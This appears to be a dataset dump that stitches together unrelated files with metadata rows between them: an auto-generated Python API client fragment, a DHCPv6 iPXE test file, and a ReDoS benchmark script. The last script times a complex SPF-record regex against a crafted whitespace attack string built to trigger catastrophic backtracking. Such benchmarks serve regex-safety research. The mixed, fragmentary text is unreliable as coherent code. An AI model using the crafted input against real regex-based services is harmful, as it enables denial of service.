raise ValueError("Missing the required parameter `routing_key` when calling `process_request_using_post4`") # noqa: E501
# verify the required parameter 'msg' is set
if ('msg' not in params or
params['msg'] is None):
raise ValueError("Missing the required parameter `msg` when calling `process_request_using_post4`") # noqa: E501
# verify the required parameter 'request_headers' is set
if ('request_headers' not in params or
params['request_headers'] is None):
raise ValueError("Missing the required parameter `request_headers` when calling `process_request_using_post4`") # noqa: E501
collection_formats = {}
path_params = {}
if 'routing_key' in params:
path_params['routingKey'] = params['routing_key'] # noqa: E501
query_params = []
header_params = {}
if 'request_headers' in params:
header_params['requestHeaders'] = params['request_headers'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'msg' in params:
body_params = params['msg']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/v1/integrations/oceanconnect/{routingKey}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeferredResultResponseEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def process_request_using_put(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_put(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.process_request_using_put_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
else:
(data) = self.process_request_using_put_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
return data
def process_request_using_put_with_http_info(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_put_with_http_info(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['routing_key', 'msg', 'request_headers'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'routing_key' is set
if ('routing_key' not in params or
params['routing_key'] is None):
raise ValueError("Missing the required parameter `routing_key` when calling `process_request_using_put`") # noqa: E501
# verify the required parameter 'msg' is set
if ('msg' not in params or
params['msg'] is None):
raise ValueError("Missing the required parameter `msg` when calling `process_request_using_put`") # noqa: E501
# verify the required parameter 'request_headers' is set
if ('request_headers' not in params or
params['request_headers'] is None):
raise ValueError("Missing the required parameter `request_headers` when calling `process_request_using_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'routing_key' in params:
path_params['routingKey'] = params['routing_key'] # noqa: E501
query_params = []
header_params = {}
if 'request_headers' in params:
header_params['requestHeaders'] = params['request_headers'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'msg' in params:
body_params = params['msg']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/v1/integrations/oceanconnect/{routingKey}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeferredResultResponseEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 43.763454 | 139 | 0.638659 | 3,975 | 34,967 | 5.349686 | 0.048302 | 0.044768 | 0.05629 | 0.046085 | 0.960357 | 0.957771 | 0.957771 | 0.956219 | 0.954667 | 0.954667 | 0 | 0.015185 | 0.27117 | 34,967 | 798 | 140 | 43.818296 | 0.819227 | 0.326279 | 0 | 0.845972 | 0 | 0 | 0.231127 | 0.072122 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035545 | false | 0 | 0.009479 | 0 | 0.097156 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
047d4eab926676a1b060945ea252eb410fe8fc92 | 5,236 | py | Python | tests/dhcpv6/classification/test_v6_ipxe.py | isc-projects/forge | dfec8b41003d6b5a229f69ee93616e0e5cc6d71b | [
"0BSD"
] | 22 | 2015-02-27T11:51:05.000Z | 2022-02-28T12:39:29.000Z | tests/dhcpv6/classification/test_v6_ipxe.py | isc-projects/forge | dfec8b41003d6b5a229f69ee93616e0e5cc6d71b | [
"0BSD"
] | 16 | 2018-10-30T15:00:12.000Z | 2019-01-11T17:55:13.000Z | tests/dhcpv6/classification/test_v6_ipxe.py | isc-projects/forge | dfec8b41003d6b5a229f69ee93616e0e5cc6d71b | [
"0BSD"
] | 11 | 2015-02-27T11:51:36.000Z | 2021-03-30T08:33:54.000Z | """DHCPv6 iPXE boot tests"""
# pylint: disable=invalid-name,line-too-long
import pytest
import misc
import srv_control
import srv_msg
@pytest.mark.v6
@pytest.mark.iPXE
def test_v6_IPXE_1():
misc.test_setup()
srv_control.config_srv_subnet('2001:db8::/64', '$(EMPTY)')
srv_control.create_new_class('a-ipxe')
srv_control.add_test_to_class(1, 'test', 'substring(option[15].hex,2,4) == \'iPXE\'')
srv_control.add_option_to_defined_class(1,
'bootfile-url',
'http://[2001:db8::1]/ubuntu.cfg')
# Server is configured with client-classification option in subnet 0 with name a-ipxe.
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'archtypes', 7)
srv_msg.client_does_include('Client', 'client-arch-type')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_sets_value('Client', 'user_class_data', 'iPXE')
srv_msg.client_does_include('Client', 'user-class')
srv_msg.client_requests_option(59)
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
srv_msg.response_check_include_option(59)
srv_msg.response_check_option_content(59, 'optdata', 'http://[2001:db8::1]/ubuntu.cfg')
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 13)
srv_msg.response_check_suboption_content(13, 3, 'statuscode', 2)
@pytest.mark.v6
@pytest.mark.iPXE
def test_v6_IPXE_2():
misc.test_setup()
srv_control.config_srv_subnet('2001:db8::/64', '$(EMPTY)')
srv_control.create_new_class('a-ipxe')
srv_control.add_test_to_class(1, 'test', 'option[61].hex == 0x0007')
srv_control.add_option_to_defined_class(1, 'bootfile-url', 'http://[2001:db8::1]/ipxe.efi')
# Server is configured with client-classification option in subnet 0 with name a-ipxe.
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'archtypes', 7)
srv_msg.client_does_include('Client', 'client-arch-type')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_requests_option(59)
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
srv_msg.response_check_include_option(59)
srv_msg.response_check_option_content(59, 'optdata', 'http://[2001:db8::1]/ipxe.efi')
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 13)
srv_msg.response_check_suboption_content(13, 3, 'statuscode', 2)
@pytest.mark.v6
@pytest.mark.iPXE
def test_v6_IPXE_combined():
misc.test_setup()
srv_control.config_srv_subnet('2001:db8::/64', '$(EMPTY)')
srv_control.create_new_class('a-ipxe')
srv_control.add_test_to_class(1, 'test', 'substring(option[15].hex,2,4) == \'iPXE\'')
srv_control.add_option_to_defined_class(1,
'bootfile-url',
'http://[2001:db8::1]/ubuntu.cfg')
srv_control.create_new_class('b-ipxe')
srv_control.add_test_to_class(2, 'test', 'option[61].hex == 0x0007')
srv_control.add_option_to_defined_class(2, 'bootfile-url', 'http://[2001:db8::1]/ipxe.efi')
srv_control.build_and_send_config_files()
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_sets_value('Client', 'archtypes', 7)
srv_msg.client_does_include('Client', 'client-arch-type')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_requests_option(59)
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
srv_msg.response_check_include_option(59)
srv_msg.response_check_option_content(59, 'optdata', 'http://[2001:db8::1]/ipxe.efi')
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 13)
srv_msg.response_check_suboption_content(13, 3, 'statuscode', 2)
misc.test_procedure()
srv_msg.client_sets_value('Client', 'archtypes', 7)
srv_msg.client_does_include('Client', 'client-arch-type')
srv_msg.client_does_include('Client', 'client-id')
srv_msg.client_does_include('Client', 'IA-NA')
srv_msg.client_sets_value('Client', 'user_class_data', 'iPXE')
srv_msg.client_does_include('Client', 'user-class')
srv_msg.client_requests_option(59)
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
srv_msg.response_check_include_option(59)
srv_msg.response_check_option_content(59, 'optdata', 'http://[2001:db8::1]/ubuntu.cfg')
srv_msg.response_check_include_option(3)
srv_msg.response_check_option_content(3, 'sub-option', 13)
srv_msg.response_check_suboption_content(13, 3, 'statuscode', 2)
| 41.228346 | 95 | 0.710275 | 767 | 5,236 | 4.478488 | 0.130378 | 0.092576 | 0.097817 | 0.110626 | 0.965939 | 0.959825 | 0.959825 | 0.950801 | 0.940029 | 0.940029 | 0 | 0.038031 | 0.146295 | 5,236 | 126 | 96 | 41.555556 | 0.730425 | 0.045073 | 0 | 0.881188 | 0 | 0 | 0.21274 | 0.011619 | 0 | 0 | 0.002404 | 0 | 0 | 1 | 0.029703 | true | 0.039604 | 0.039604 | 0 | 0.069307 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
049bb07740ef931bfadbdeed93e59ba49575bc92 | 4,195 | py | Python | regexlib/python_re2_test_file/regexlib_7920.py | yetingli/ReDoS-Benchmarks | f5b5094d835649e957bf3fec6b8bd4f6efdb35fc | [
"MIT"
] | 1 | 2022-01-24T14:43:23.000Z | 2022-01-24T14:43:23.000Z | regexlib/python_re2_test_file/regexlib_7920.py | yetingli/ReDoS-Benchmarks | f5b5094d835649e957bf3fec6b8bd4f6efdb35fc | [
"MIT"
] | null | null | null | regexlib/python_re2_test_file/regexlib_7920.py | yetingli/ReDoS-Benchmarks | f5b5094d835649e957bf3fec6b8bd4f6efdb35fc | [
"MIT"
] | null | null | null | # 7920
# ^v=spf1[ \t]+[+?~-]?(?:(?:all)|(?:ip4(?:[:][0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})?(?:/[0-9]{1,2})?)|(?:ip6(?:[:]([0-9A-Fa-f]{1,4}:){7}[0-9A-Fa-f]{1,4})?(?:/[0-9]{1,2})?)|(?:a(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+)?(?:/[0-9]{1,2})?)|(?:mx(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+)?(?:/[0-9]{1,2})?)|(?:ptr(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:exists(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:include(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:redirect(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:exp(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|)(?:(?:[ \t]+[+?~-]?(?:(?:all)|(?:ip4(?:[:][0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})?(?:/[0-9]{1,2})?)|(?:ip6(?:[:]([0-9A-Fa-f]{1,4}:){7}[0-9A-Fa-f]{1,4})?(?:/[0-9]{1,2})?)|(?:a(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+)?(?:/[0-9]{1,2})?)|(?:mx(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+)?(?:/[0-9]{1,2})?)|(?:ptr(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:exists(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:include(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:redirect(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:exp(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|))*)?$
# EXPONENT
# nums:5
# EXPONENT AttackString:"v=spf1 "+" "*32+"! _1_NQ"
import re2 as re
from time import perf_counter
regex = """^v=spf1[ \t]+[+?~-]?(?:(?:all)|(?:ip4(?:[:][0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})?(?:/[0-9]{1,2})?)|(?:ip6(?:[:]([0-9A-Fa-f]{1,4}:){7}[0-9A-Fa-f]{1,4})?(?:/[0-9]{1,2})?)|(?:a(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+)?(?:/[0-9]{1,2})?)|(?:mx(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+)?(?:/[0-9]{1,2})?)|(?:ptr(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:exists(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:include(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:redirect(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:exp(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|)(?:(?:[ \t]+[+?~-]?(?:(?:all)|(?:ip4(?:[:][0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})?(?:/[0-9]{1,2})?)|(?:ip6(?:[:]([0-9A-Fa-f]{1,4}:){7}[0-9A-Fa-f]{1,4})?(?:/[0-9]{1,2})?)|(?:a(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+)?(?:/[0-9]{1,2})?)|(?:mx(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+)?(?:/[0-9]{1,2})?)|(?:ptr(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:exists(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:include(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:redirect(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|(?:exp(?:[:][A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)+))|))*)?$"""
REGEX = re.compile(regex)
for i in range(0, 150000):
ATTACK = "v=spf1 " + " " * i * 1 + "! _1_NQ"
LEN = len(ATTACK)
BEGIN = perf_counter()
m = REGEX.search(ATTACK)
# m = REGEX.match(ATTACK)
DURATION = perf_counter() - BEGIN
print(f"{i *1}: took {DURATION} seconds!") | 220.789474 | 1,892 | 0.390465 | 963 | 4,195 | 1.693666 | 0.05919 | 0.309013 | 0.515021 | 0.618026 | 0.842428 | 0.842428 | 0.842428 | 0.842428 | 0.842428 | 0.842428 | 0 | 0.129765 | 0.024553 | 4,195 | 19 | 1,893 | 220.789474 | 0.268817 | 0.470083 | 0 | 0 | 0 | 0.090909 | 0.86829 | 0.84258 | 0.090909 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.181818 | 0 | 0.181818 | 0.090909 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 15 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.